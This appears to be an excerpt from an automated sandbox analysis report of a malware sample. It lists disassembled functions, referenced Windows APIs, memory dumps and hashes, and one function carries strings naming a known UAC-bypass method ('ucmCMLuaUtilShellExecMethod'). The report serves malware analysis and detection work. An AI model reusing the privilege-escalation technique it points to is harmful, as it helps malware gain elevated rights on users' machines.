                                                                                                                                                                                                                                                                                                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID: PgF
                                                                                                                                                                                                                                                                                                                              • API String ID: 2180151492-654241383
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 83d26750b717ed111933d1044fffe3928900f1353bad1f08cb3389c5db342b5d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83d26750b717ed111933d1044fffe3928900f1353bad1f08cb3389c5db342b5d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                                                                                                                                                                                                                              Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                                                                                                                                                                                                                              Function 02833370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0283339B
                                                                                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 028333A3
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 02833431
                                                                                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0283345C
                                                                                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 028334B1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f3b3c3011ca0a543c31215e7edc77454e0460b0859e21e56f68863cebacec23b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2bbf580f4215d19bc68ef05bf377d27f6a8d93afddf8e711cb39f0a373d51712
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b3c3011ca0a543c31215e7edc77454e0460b0859e21e56f68863cebacec23b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85418F3CE002089BCF12DF68D844A9EBBA5AF45328F14C1A5E919DB291D736AA15CBD1
                                                                                                                                                                                                                                                                                                                              Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                                                                                                                                                                                                                              Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                                                                                                              • String ID: p[G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2536120697-440918510
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                                                                                                                                                                                                                              Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                                                                                                                                                                                                                              Function 0283925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02839221: _free.LIBCMT ref: 0283924A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392AB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392B6
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028392C1
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839315
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839320
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283932B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839336
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d9e29db4d09098c4455dadf4160b50ef4fb0e86974a08a9d0444cd2e88f89be4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1211307D550B08EAD672B7B4DC45FCB7B9EAF04700F800C25E6B9E6052DBA5E5044A92
                                                                                                                                                                                                                                                                                                                              Function 1001CD3A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1001CCFE: _free.LIBCMT ref: 1001CD27
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CD88
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CD93
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CD9E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CDF2
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CDFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CE08
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CE13
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 240818be63ccc3dc83c97ca6d82296bdbd890e81bd7557c088d8b4c1d65aa4e5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C112C75540B08EAD520EBB0CC46FCB779DDF04B00F880D1DB69D6E052DA79F9859B91
                                                                                                                                                                                                                                                                                                                              Function 1000CFA2 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000CFB0
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1000CFBE
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000CFD7
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000D029
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 42fd6e2f6c8fd24065b669452523f428359482c8d7ddecb3c68a8dbe90369287
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: daf2971fb1b7fa9d29d124202b93d1ca0888c805d10c765a5d3317812adc99da
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E012836609B2A6EF31197749CC9F2B26D8DB457F1B30022AF928850F8FE115C475150
                                                                                                                                                                                                                                                                                                                              Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe), ref: 00406835
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                                                                                                                                                                                                                                                                                                                              • [+] before ShellExec, xrefs: 00406856
                                                                                                                                                                                                                                                                                                                              • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                                                                                                                                                                                                                                                                                                              • [+] ShellExec success, xrefs: 00406873
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                                                                                                                                              • API String ID: 3851391207-3740688872
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                                                                                                                              Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
